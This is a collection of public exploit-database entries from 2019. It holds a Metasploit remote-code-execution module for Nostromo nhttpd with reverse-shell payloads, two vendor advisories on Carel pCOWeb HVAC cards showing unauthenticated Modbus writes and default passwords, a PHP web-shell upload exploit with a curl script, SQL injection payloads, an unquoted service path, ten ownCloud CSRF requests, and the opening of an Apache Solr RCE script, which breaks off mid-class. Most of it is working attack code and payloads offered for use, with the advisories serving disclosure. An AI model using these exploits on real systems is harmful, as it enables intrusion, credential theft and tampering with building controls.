          This module exploits a remote command execution vulnerability in
        Nostromo <= 1.9.6. This issue is caused by a directory traversal
        in the function `http_verify` in nostromo nhttpd allowing an attacker
        to achieve remote code execution via a crafted HTTP request.
      },
'Author'         =>
        [
'Quentin Kaiser <kaiserquentin[at]gmail.com>', # metasploit module
'sp0re', # original public exploit
        ],
'License'        => MSF_LICENSE,
'References'     =>
        [
          [ 'CVE', '2019-16278'],
          [ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
        ],
'Platform'      => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
'Arch'  => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
            {
'Platform' => 'unix',
'Arch'  => ARCH_CMD,
'Type'  => :unix_memory,
'DefaultOptions'  => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
            }
          ],
          ['Automatic (Linux Dropper)',
            {
'Platform' => 'linux',
'Arch'  => [ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
'Type'  => :linux_dropper,
'DefaultOptions'  => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}
            }
          ]
        ],
'DisclosureDate' => 'Oct 20 2019',
'DefaultTarget' => 0,
'Notes'         => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
      }
    ))

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  def check
    res = send_request_cgi({
'method'   => 'GET',
'uri'      => normalize_uri(target_uri.path),
      }
    )

    unless res
      vprint_error("Connection failed")
      return CheckCode::Unknown
    end

    if res.code == 200 and res.headers['Server'] =~ /nostromo [\d.]{5}/
      /nostromo (?<version>[\d.]{5})/ =~ res.headers['Server']
      if Gem::Version.new(version) <= Gem::Version.new('1.9.6')
        return CheckCode::Appears
      end
    end

    return CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    send_request_cgi({
'method'  => 'POST',
'uri'     => normalize_uri(target_uri.path, '/.%0d./.%0d./.%0d./.%0d./bin/sh'),
'headers' => {'Content-Length:' => '1'},
'data'    => "echo\necho\n#{cmd} 2>&1"
      }
    )
  end

  def exploit
    # These CheckCodes are allowed to pass automatically
    checkcodes = [
      CheckCode::Appears,
      CheckCode::Vulnerable
    ]

    unless checkcodes.include?(check) || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    print_status("Configuring #{target.name} target")

    case target['Type']
    when :unix_memory
      print_status("Sending #{datastore['PAYLOAD']} command payload")
      vprint_status("Generated command payload: #{payload.encoded}")

      res = execute_command(payload.encoded)

      if res && datastore['PAYLOAD'] == 'cmd/unix/generic'
        print_warning('Dumping command output in full response body')

        if res.body.empty?
          print_error('Empty response body, no command output')
          return
        end

        print_line(res.body)
      end
    when :linux_dropper
      print_status("Sending #{datastore['PAYLOAD']} command stager")
      execute_cmdstager
    end
  end
end

Advisory: Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC

As part of it's features, the Carel pCOWeb card exposes a Modbus
interface to the network. By design, Modbus does not provide
authentication, allowing to control the affected system.


Details
=======

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Unauthenticated Access
Security Risk: high
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-14
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that
use the HVAC protocols based on the Ethernet physical standard, such as
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated
Web-Server, which both contains the HTML pages relating to the specific
application and allows a browser to be used for remote system
management."
(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and
considered obsolete by the vendor.


More Details
============

While authentication is required to access the web interface (compare
advisory rt-sa-2019-013 [0]) no authentication is necessary for using
the Modbus interface on TCP port 502, since the Modbus protocol did not
offer any authentication mechanism during the device's lifetime.
The addition of encryption and authentication was only recently proposed
by the Modbus Organization [1].

It is believed that this might be analogous to the problem described in
CVE-2019-13549 for the special case of Rittal SK 3232 products. Other
OEMs are affected, too.


Proof of Concept
================

The web interface of the Carel pCOWeb card allows authenticated users to
read and write many variables of the system via the URL

http://192.168.0.1/config/adminpage.html

This web page seems to provide access to all Modbus variables using
large tables of variables 1-207 for digital, analog and integer
variables, respectively.

By accessing TCP port 502 (Modbus to TCP), it is possible to access
these variables without authentication. This can be done, for example,
by using the Metasploit [2] modbusclient [3] module:

------------------------------------------------------------------------
msf5 > use auxiliary/scanner/scada/modbusclient
msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1
RHOSTS => 192.168.0.1
msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10
DATA_ADDRESS => 10
msf5 auxiliary(scanner/scada/modbusclient) > run

[*] 192.168.0.1:502 - Sending READ REGISTERS...
[+] 192.168.0.1:502 - 1 register values from address 10 :
[+] 192.168.0.1:502 - [240]
[*] Auxiliary module execution completed
------------------------------------------------------------------------

The returned value matches the set temperature of 24°C multiplied by
ten, as the variable can only hold integers. Using the same module, it
is possible to change the temperature setpoint, too:

------------------------------------------------------------------------
msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER
ACTION => WRITE_REGISTER
msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241
DATA => 241
msf5 auxiliary(scanner/scada/modbusclient) > run

[*] 192.168.0.1:502 - Sending WRITE REGISTER...
[+] 192.168.0.1:502 - Value 241 successfully written at registry address 10
[*] Auxiliary module execution completed
------------------------------------------------------------------------

This allows unauthenticated remote attackers to reconfigure the device.

Depending on OEM integration, different variables might represent
different settings.

Additionally, the system provides SNMP (UDP Port 161) write access with
the SNMP community string "public" or "carel" (depending on version) as
documented in the manual [4] and BACnet over IP (UDP Port 47808).

Workaround
==========

The Carel pCOWeb card should not be connected to networks accessible by
untrusted users.


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=============

Since the Modbus protocol implemented in the Carel pCOWeb card does not
offer auhtentication, it is not possible to limit access to the system
to authorized users, allowing attackers to control the system if the
device is accessible via the network. This is considered to pose a high
risk in context of the Carel pCOWeb card.


Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13549


References
==========

[0] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-013.txt
[1] http://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf
[2] https://www.metasploit.com/
[3] https://www.rapid7.com/db/modules/auxiliary/scanner/scada/modbusclient
[4] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen

Advisory: Unsafe Storage of Credentials in Carel pCOWeb HVAC

The Carel pCOWeb card stores password hashes in the file "/etc/passwd",
allowing privilege escalation by authenticated users. Additionally,
plaintext copies of the passwords are stored.


Details
=======

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Credential Disclosure / Privilege Escalation
Security Risk: low
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-13
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that
use the HVAC protocols based on the Ethernet physical standard, such as
BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated
Web-Server, which both contains the HTML pages relating to the specific
application and allows a browser to be used for remote system
management."
(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and
considered obsolete by the vendor.


More Details
============

The Carel pCOWeb interface provides user accounts with different levels
of privileges. Despite the different privileges, other users, even the
user nobody, are able to read the file "/etc/passwd" which contains the
hashed passwords for all user accounts, especially those with more
privileges. Additionally, a plaintext copy of all passwords is stored in
the file /usr/local/root/flash/etc/sysconfig/userspwd, which is
accessible from the web interface at the URL
http://192.168.0.1/config/pw_changeusers.html
This allows attackers with knowledge of one user account password to
gain knowledge of the other accounts passwords, possibly gaining more
privileges.


Proof of Concept
================

Apart from a web interface, the Carel pCOWeb card provides a telnet
interface accessible using a variety of default passwords and, in some
cases, the user "nobody" without password:

------------------------------------------------------------------------
$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

Linux 2.4.21-rmk1 (pCOWeb) (ttya0)


pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r--   1 root     root          317 Jan  1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$
------------------------------------------------------------------------

The following table lists the cleartext passwords for above
password hashes:

 username   |  password
 ----------------------
 root       |  froot
 httpadmin  |  fhttpadm
 carel      |  fcarel
 guest      |  fguest
 nobody     |  (none)
 admin      |  fadmin

The passwords for the useraccounts "root", "httpadmin", "carel" and
"guest" are documented in section 9.7.2 of the user manual [0], warning
users:

"it is important to set a password other than the default "froot" to
    prevent potentially dangerous outside access."


It is possible that these default credentials are covered in
CVE-2019-13553. Depending on firmware version and/or OEM modifications,
some versions additionally allow Telnet login without password with the
username "nobody" while it is disabled for other versions.

The password for the web interface user "admin" is documented in section
9.2.1 of the user manual [0].

Additionally, some versions were seen with additional user credentials
stored in the directory provided for OEM modifications of the web
interface, such as the username "reserved" with the password "freserve"
in "/usr/local/root/flash/http/reserved/.htpasswd".
Storing some of these passwords in plaintext is covered in
CVE-2019-11369.

However, while the above passwords are stored in hashed form, the web
interface at http://192.168.0.1/config/pw_changeusers.html shows them in
plaintext. A file containing the plaintext passwords can be found in the
filesystem:

------------------------------------------------------------------------
[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
------------------------------------------------------------------------


Workaround
==========

Change all default passwords listed above and ensure the user "nobody"
is disabled or has a password set.
The Carel pCOWeb card should not be connected to networks accessible by
untrusted users (compare advisory rt-sa-2019-014[1]).


Fix
===

No updated firmware will be published for pCOWeb Cards, as they are
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.


Security Risk
=============

Attackers with knowledge of one set of user credentials to a Carel
pCOWeb card could use the password hashes accessible to all users in
"/etc/passwd" or the plaintext copies of the passwords to gain
different privileges. Due to the necessity of access to credentials,
this is considered to pose a low risk only.


Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553


References
==========

[0] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen

[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection

[+] Venedor Home Page : https://scripteen.com/
[+] Author : z3r0fy
[+] Twitter : z3r0fy
[+] Website : www.bugcontainer.gq
[+] CX Security Link : https://cxsecurity.com/issue/WLB-2019100145

[+] Description :

Due to these codes in the View.php file

$home  =  fopen($_GET["file"],  "w");  fwrite($home,  $_GET["data"]);

File can be written arbitrarily
Exploit :  /app/view.php?file=shell.php&data=<?php phpinfo();?>
If you want to be made more offensive,
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>
After poc is applied, This way the command can be run on the server "shell.php?cmd="​​



[+] PoC :

#!/bin/bash
echo "
 __________ ____   ___  _______   __
|__  /___ /|  _ \ / _ \|  ___\ \ / /
  / /  |_ \| |_) | | | | |_   \ V /
 / /_ ___) |  _ <| |_| |  _|   | |
/____|____/|_| \_\\___/|_|     |_|

"
echo""
echo -n "[+] TARGET : " ;read hedef
echo -n "[+] PHP Code : " ;read kod
curl $hedef/app/view.php?file=shell.php&data=$kod

[+] Mr Blog PHP Script Multiple Vulnerabilities
[+] Author : z3r0fy
[+] Twitter.com/z3r0fy
[+] Cx Security Link : https://cxsecurity.com/issue/WLB-2019100165

# Download Pages :

[+] https://wmaraci.com/forum/scriptler/kisisel-mr-blog-scripti-ucretsiz-indir-500655.html
[+] https://scriptadresim.blogspot.com/2017/05/mr-blog-mobil-uyumlu-responsive-tasarm.html
[+] https://donanimplus.com/phpscript/kisisel-mr-blog-scripti-ucretsiz-indir/


# Vulnerabilities

[+] Vulnerability 1 - SQL Injection

[+] Vulnerability:  http://vulnerabletarget.com/foot.php?kat=[SQL]

*********************************************************

[+] Vulnerability 2 - Cross-Site Scripting

[+] VUlnerable : http://vulnerabletarget.com/sayfa-duzenle.php?duzenle=[XSS Payload]

# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection
# Date: 2019-11-01
# Exploit Author: Cakes
# Vendor Homepage: https://github.com/thejshen/contentManagementSystem
# Version: 1.04
# Software Link: https://github.com/thejshen/contentManagementSystem.git
# Tested on: CentOS7

# GET parameter 'id' easy SQL Injection
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4' AND 5143=5143-- OWXt
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]

# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path
# Author: Sainadh Jamalpur
# Date: 2019-10-31
# Vendor Homepage: https://openvpn.net/
# Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
# Version : PrivateTunnel v2.8.4
# Tested on: Windows 10 64bit(EN)
# CVE : N/A

# =====================================================
# 1. Description:
# Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path.

#PoC
===========
C:\>sc qc ovpnagent
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ovpnagent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\OpenVPN
Technologies\PrivateTunnel\ovpnagent.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OpenVPN Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

#Exploit:
============
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery
# Date: 2019-10-31
# Exploit Author: Ozer Goker
# Vendor Homepage: https://owncloud.org
# Software Link: https://owncloud.org/download/
# Version: 10.3
# CVE: N/A

# Introduction
# Your personal cloud collaboration platform With over 50 million users
# worldwide, ownCloud is the market-leading open source software for
# cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive
# and Google Drive, ownCloud offers real data security and privacy for you
# and your data.

##################################################################################################################################

# CSRF1
# Create Folder

MKCOL /remote.php/dav/files/user/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo=
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF2
# Delete Folder

DELETE /remote.php/dav/files/user/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI=
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF3
# Create User

POST /index.php/settings/users/users HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
eRIlHRIBJF0jU1w9CSY+AT8CX18gTh90JV8UQwQdfEg=:JVhMY8G9u7/iKplTfO00k7G5c2BqjoOcCWkAHYdZV5I=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 39
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

username=test&password=&email=test@test



##################################################################################################################################

# CSRF4
# Delete User

DELETE /index.php/settings/users/users/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
BQ8vIjp9LjACFxwEB2QkMSsuG14kHy4SKio6URckUlk=:6KbrqDMTTsoPE2vdrct1ofvSlGlcyVarSAOFV9PFuLQ=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF5
# Create Group

POST /index.php/settings/users/groups HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
BRd8ZDsAFREkB0YxdAIaYi8/ABsyCBIDExs/Wgw9a28=:6S14p9vurc5e6TH7vrotyqJBUvihbOXDUWMKYbS23UU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 7
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

id=test


##################################################################################################################################

# CSRF6
# Delete Group

DELETE /index.php/settings/users/groups/test HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
aTElBwBqTAUYEEQacjdgER4hJ0QIA20sdF00CwtHUm0=:ZuhWKS/aNt7N0a2DGlH+Cz5m20b9e5aFOSBKkqJOALw=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k


##################################################################################################################################

# CSRF7
# Change User Full Name

POST /index.php/settings/users/user/displayName HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
fzYYPjtaVBUeKj8CBzojJHIgXTkTTT4GbR0vBT4TCm0=:LrUnpc7qHNLVElqq+m2VX4fG+py7Pa9FK8DpB84dSdY=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 37
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

displayName=user1&oldDisplayName=user


##################################################################################################################################

# CSRF8
# Change User Email

PUT /index.php/settings/users/user/mailAddress HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
QAkuGRpIMg88IzsXBTMeYREpCA4zLhcQHiMsQBo7WWo=:sMcIQqQkjGHCGeL4HdgaxWOQXNzrtIjAou6akezvpcI=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

mailAddress=user1%40example.com


##################################################################################################################################

# CSRF9
# Change User Password


POST /index.php/settings/personal/changepassword HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

oldpassword=1234&personal-password=1&personal-password-clone=1


##################################################################################################################################

# CSRF10
# Change Language

POST /index.php/settings/ajax/setlanguage.php HTTP/1.1
Host: 192.168.2.111
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
fwkfaH9zECcMJR4CFS8EZSF5NhseCwkYciMXeVclBB4=:LMR84JsCZAmVWyV0x4YtUrQY4NAK9W75wnR46WsbXbU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 7
Origin: http://192.168.2.111
DNT: 1
Connection: close
Cookie:
oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe;
ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k

lang=tr


##################################################################################################################################

# Title: Apache Solr 8.2.0 - Remote Code Execution
# Date: 2019-11-01
# Author: @l3x_wong
# Vendor: https://lucene.apache.org/solr/
# Software Link: https://lucene.apache.org/solr/downloads.html
# CVE: N/A
# github: https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template

# usage: python3 script.py ip [port [command]]
#                default port=8983
#                default command=whoami
# note:
# Step1: Init Apache Solr Configuration
# Step2: Remote Exec in Every Solr Node

import sys
import json
import time
import requests


class initSolr(object):

    timestamp_s = str(time.time()).split('.')
    timestamp = timestamp_s[0] + timestamp_s[1][0:-3]

    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

